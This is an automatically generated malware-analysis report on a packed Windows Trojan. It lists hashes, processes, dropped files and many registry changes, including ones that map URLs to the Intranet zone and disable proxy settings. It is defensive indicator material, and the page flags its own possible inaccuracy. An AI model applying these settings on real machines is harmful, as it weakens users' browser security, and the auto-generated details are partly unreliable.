Gen.Variant.Kazy.202598_353f881950

by malwarelabrobot on November 12th, 2015 in Malware Descriptions.

Trojan.Win32.Yoddos.vqa (Kaspersky), Gen:Variant.Kazy.202598 (B) (Emsisoft), Gen:Variant.Kazy.202598 (AdAware), Trojan.Win32.Swrort.3.FD, GenericInjector.YR (Lavasoft MAS)
Behaviour: Trojan


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: 353f881950e6de185c9070fc4b158bd8
SHA1: dd0751b9015b331e55ae36e16921c337cd7e4d7c
SHA256: 74c23477507e1ff67580b3f27a3e06d040a3844db9955facda385be164a48ec9
SSDeep: 98304:eoqowFkRF8IsllQk9Z7hEydAkrpSfJ4O7NuLP:qiFC5JbIB307
Size: 3887109 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: PolyEnE001byLennartHedlund, UPolyXv05_v6
Company: Xacti, LLC
Created at: 2014-09-30 16:54:56
Analyzed on: WindowsXP SP3 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

nvsvc32.exe:2544
hdptlk.exe:2556
ndis500.exe:2916
yYJSx.exe:1976
appmon.exe:3368
%original file name%.exe:228
MiniIE.exe:2752
ndsqp.exe:2956
tray.exe:3316
traytp.exe:452
ndislib.exe:3296

The Trojan injects its code into the following process(es):

Cattle.exe:3444
Explorer.EXE:1572

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process nvsvc32.exe:2544 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\HpE\wow64\configWord.cf (676 bytes)
%WinDir%\HpE\wow64\rebuild.exe (8147 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0HUL6ZQ7\hotkey[1].txt (676 bytes)
%System%\cBLK.dll (2341 bytes)
%System%\clk.ini (186 bytes)
%WinDir%\HpE\wow64\DProEx.sys (1176 bytes)
%WinDir%\HpE\wow64\reTcp.sys (588 bytes)
%WinDir%\HpE\wow64\config.ini (98 bytes)

The Trojan deletes the following file(s):

%System%\cmd.exe (0 bytes)

The process ndis500.exe:2916 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\HpE\sys32\weblog.log (263 bytes)
%WinDir%\HpE\sys32\m0gtv9N (3809 bytes)
%WinDir%\HpE\sys32\xp28p2U.sys (22 bytes)

The Trojan deletes the following file(s):

%WinDir%\HpE\sys32\m0gtv9N (0 bytes)
%WinDir%\HpE\sys32\xp28p2U.sys (0 bytes)

The process yYJSx.exe:1976 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\evaqocv.txt (17 bytes)
%System%\tl.dat (13 bytes)
%System%\bc.dat (3808 bytes)
%System%\tl.txt (1444 bytes)
%WinDir%\HpE\First.txt (23220 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\yfodbgl.txt (2321 bytes)
%WinDir%\HpE\sys32\urlnav.txt (14076 bytes)
%System%\ndislib.exe (243 bytes)
%WinDir%\HpE\hdptlk.exe (139 bytes)
%WinDir%\HpE\sys32\tray.txt (221016 bytes)
%WinDir%\HpE\wow64\nvsvc32.exe (17629 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\tcueuqo.txt (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\mwgxskf.txt (673 bytes)
%WinDir%\HpE\exec\traytp.exe (1794 bytes)
%WinDir%\HpE\wow64\nvsvc32.txt (448324 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\lfllrdu.txt (15278 bytes)
%WinDir%\HpE\MiniIE.txt (175005 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\przmycg.txt (673 bytes)
%System%\ndislib.txt (40972 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\sccppeu.txt (13122 bytes)
%System%\bc.txt (127812 bytes)
%WinDir%\HpE\MiniIE.exe (7386 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\uwvmjte.txt (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\mxezyyf.txt (7345 bytes)
%WinDir%\HpE\sys32\ndis500.exe (325 bytes)
%WinDir%\HpE\sys32\whitelist.dat (2 bytes)
%WinDir%\HpE\sys32\urlnav.dll (83 bytes)
%System%\appmon.exe (9606 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ihutphk.txt (1425 bytes)
%WinDir%\HpE\sys32\tray.exe (7972 bytes)
%WinDir%\HpE\sys32\whitelist.txt (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\rhkqvcb.txt (26096 bytes)
%WinDir%\HpE\sys32\ndis500.txt (55748 bytes)
%System%\lhc.txt (32148 bytes)
%WinDir%\HpE\sys32\ndsqp.exe (106 bytes)
%WinDir%\HpE\exec\traytp.txt (88420 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\oqgrsfe.txt (10177 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nagsjof.txt (601 bytes)
%WinDir%\HpE\flist.bin (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ipobzxt.txt (4545 bytes)
%System%\drivers\HideSys.sys (15 bytes)
%System%\appmon.txt (263811 bytes)
%System%\lhc.dat (185 bytes)
%WinDir%\HpE\sys32\ndsqp.txt (17980 bytes)

The process appmon.exe:3368 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\Temp\AdbWinUsbApi.dll (60 bytes)
%WinDir%\Temp\adbWinpi.dll (304 bytes)
%WinDir%\Temp\Cattle.exe (3727 bytes)
%WinDir%\Temp\AdbWinApi.dll (96 bytes)
%WinDir%\Temp\TscServer.exe (1653 bytes)

The process %original file name%.exe:228 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\8LG56LOL\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\PYJT5JHI\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0HUL6ZQ7\desktop.ini (67 bytes)
%System%\LQdhJ\yYJSx.exe (414 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\P4IK7RMW\desktop.ini (67 bytes)

The process ndsqp.exe:2956 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\HpE\sys32\weblog.log (585 bytes)
%WinDir%\HpE\sys32\oK455Vp (13 bytes)
%WinDir%\HpE\sys32\z7AQ9Ew.sys (22 bytes)

The Trojan deletes the following file(s):

%WinDir%\HpE\sys32\oK455Vp (0 bytes)
%WinDir%\HpE\sys32\z7AQ9Ew.sys (0 bytes)

The process tray.exe:3316 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\HpE\sys32\services.exe (3904 bytes)

The process traytp.exe:452 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\HpE\exec\ico.ini (292 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\8LG56LOL\statbar[1].ini (152 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\traytp.lnk (640 bytes)

The process ndislib.exe:3296 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%System%\v9pce8W (1629 bytes)
%System%\weblog.log (349 bytes)
%System%\gy17y1D.sys (22 bytes)

The Trojan deletes the following file(s):

%System%\v9pce8W (0 bytes)
%System%\gy17y1D.sys (0 bytes)

Registry activity

The process nvsvc32.exe:2544 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1D 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"WarnOnZoneCrossing" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1]
"1609" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCR\Microsoft.IE]
"(Default)" = "%WinDir%\HpE\wow64\rebuild.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\123]
"HomePage" = "0"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8E F9 A4 E8 40 EC 6D 61 0B 7E 1F AF 80 CE 12 74"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following registry key(s):

[HKLM\System\CurrentControlSet\Services\DProEx]
[HKLM\System\CurrentControlSet\Services\FixTool\Enum]
[HKLM\System\CurrentControlSet\Services\FixTool\Security]
[HKLM\System\CurrentControlSet\Services\DProEx\Enum]
[HKLM\System\CurrentControlSet\Services\FixTool]
[HKLM\System\CurrentControlSet\Services\DProEx\Security]

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process hdptlk.exe:2556 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCR\TypeLib\{40195CA5-4EA4-4B10-88B3-5659A0A5310B}\1.0\0\win32]
"(Default)" = "%WinDir%\HpE\sys32\urlnav.dll"

[HKCR\CLSID\{9A4DDA61-1D3A-49B7-9849-DAC6CD30A393}\ProgID]
"(Default)" = "Urlnav.Nav.1"

[HKCR\Urlnav.Nav]
"(Default)" = "Nav Class"

[HKCR\TypeLib\{40195CA5-4EA4-4B10-88B3-5659A0A5310B}\1.0]
"(Default)" = "urlnav 1.0 Type Library"

[HKCR\CLSID\{9A4DDA61-1D3A-49B7-9849-DAC6CD30A393}]
"(Default)" = "Nav Class"

[HKCU\Software\Microsoft\Internet Explorer\Main]
"Error Dlg Displayed On Every Error" = "no"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\AdvancedOptions\BROWSE\SCRIPT_ERROR_CACHE]
"DefaultValue" = "yes"

[HKCR\Interface\{ED2676C8-F22C-4E60-9812-E2851B2AD210}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Urlnav.Nav.1]
"(Default)" = "Nav Class"

[HKCR\Interface\{ED2676C8-F22C-4E60-9812-E2851B2AD210}\TypeLib]
"Version" = "1.0"

[HKCR\Urlnav.Nav.1\CLSID]
"(Default)" = "{9A4DDA61-1D3A-49B7-9849-DAC6CD30A393}"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\AdvancedOptions\BROWSE\SCRIPT_ERROR_CACHE]
"CheckedValue" = "yes"

[HKCR\Urlnav.Nav\CLSID]
"(Default)" = "{9A4DDA61-1D3A-49B7-9849-DAC6CD30A393}"

[HKCR\TypeLib\{40195CA5-4EA4-4B10-88B3-5659A0A5310B}\1.0\FLAGS]
"(Default)" = "0"

[HKCR\CLSID\{9A4DDA61-1D3A-49B7-9849-DAC6CD30A393}\InprocServer32]
"ThreadingModel" = "Apartment"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\AdvancedOptions\BROWSE\SCRIPT_ERROR_CACHE]
"UncheckedValue" = "no"

[HKCU\Software\Microsoft\Internet Explorer\New Windows]
"PopupMgr" = "no"

[HKCR\CLSID\{9A4DDA61-1D3A-49B7-9849-DAC6CD30A393}\VersionIndependentProgID]
"(Default)" = "Urlnav.Nav"

[HKCR\Interface\{ED2676C8-F22C-4E60-9812-E2851B2AD210}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "39 25 ED 45 9E EA 26 3B 22 EC 5B F9 23 D4 A4 EC"

[HKCR\Interface\{ED2676C8-F22C-4E60-9812-E2851B2AD210}]
"(Default)" = "INav"

[HKCR\Interface\{ED2676C8-F22C-4E60-9812-E2851B2AD210}\TypeLib]
"(Default)" = "{40195CA5-4EA4-4B10-88B3-5659A0A5310B}"

[HKCR\CLSID\{9A4DDA61-1D3A-49B7-9849-DAC6CD30A393}\InprocServer32]
"(Default)" = "%WinDir%\HpE\sys32\urlnav.dll"

[HKCR\TypeLib\{40195CA5-4EA4-4B10-88B3-5659A0A5310B}\1.0\HELPDIR]
"(Default)" = "%WinDir%\HpE\sys32\"

The process Cattle.exe:3444 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "AD 32 30 F8 40 1A 87 6C B9 71 22 D2 A7 1C 4B 3D"

The process ndis500.exe:2916 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C1 15 B6 36 09 56 56 81 4F 4C 6F EB 9D D1 BD 06"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Trojan deletes the following registry key(s):

[HKLM\System\CurrentControlSet\Services\lf3qZKD\Enum]
[HKLM\System\CurrentControlSet\Services\lf3qZKD\Security]
[HKLM\System\CurrentControlSet\Services\lf3qZKD]

The process yYJSx.exe:1976 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "3E 24 F8 5D 45 D7 83 69 E9 0E 49 A2 2F 38 B9 86"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

The process appmon.exe:3368 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F7 B9 63 7A E1 CE 31 05 6D D3 6D 47 51 32 E1 D1"

The process %original file name%.exe:228 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1B 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "00 1A 04 5F 39 2C 57 66 95 F8 4B 10 42 E7 97 B1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process MiniIE.exe:2752 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D8 0A 14 13 3E 46 6C 22 03 26 65 B4 F9 35 D6 04"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\AdvancedOptions\BROWSE\SCRIPT_DEBUGGER_IE]
"DefaultValue" = "yes"

[HKCR\Microsoft.PubIE]
"(Default)" = "%WinDir%\HpE\MiniIE.exe"

[HKCU\Software\Microsoft\Internet Explorer\Main]
"DisableScriptDebuggerIE" = "yes"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\AdvancedOptions\BROWSE\SCRIPT_DEBUGGER]
"CheckedValue" = "yes"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\AdvancedOptions\BROWSE\SCRIPT_DEBUGGER_IE]
"CheckedValue" = "yes"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_SCRIPTURL_MITIGATION]
"MiniIE.exe" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3]
"1601" = "0"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\AdvancedOptions\BROWSE\SCRIPT_DEBUGGER]
"UncheckedValue" = "no"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\AdvancedOptions\BROWSE\SCRIPT_DEBUGGER_IE]
"UncheckedValue" = "no"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MaxConnectionsPerServer" = "10"
"MaxConnectionsPer1_0Server" = "10"

[HKCU\Software\Microsoft\Internet Explorer\Main]
"Disable Script Debugger" = "yes"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\AdvancedOptions\BROWSE\SCRIPT_DEBUGGER]
"DefaultValue" = "yes"

The process ndsqp.exe:2956 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "AC 05 C7 C8 F2 40 05 76 5F 84 40 05 CD 63 B2 3B"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Trojan deletes the following registry key(s):

[HKLM\System\CurrentControlSet\Services\n1P2bmf\Security]
[HKLM\System\CurrentControlSet\Services\n1P2bmf]
[HKLM\System\CurrentControlSet\Services\n1P2bmf\Enum]

The process tray.exe:3316 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D3 1D E8 4C A5 82 0E 16 7C 1A D1 51 96 20 02 BC"

The process traytp.exe:452 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

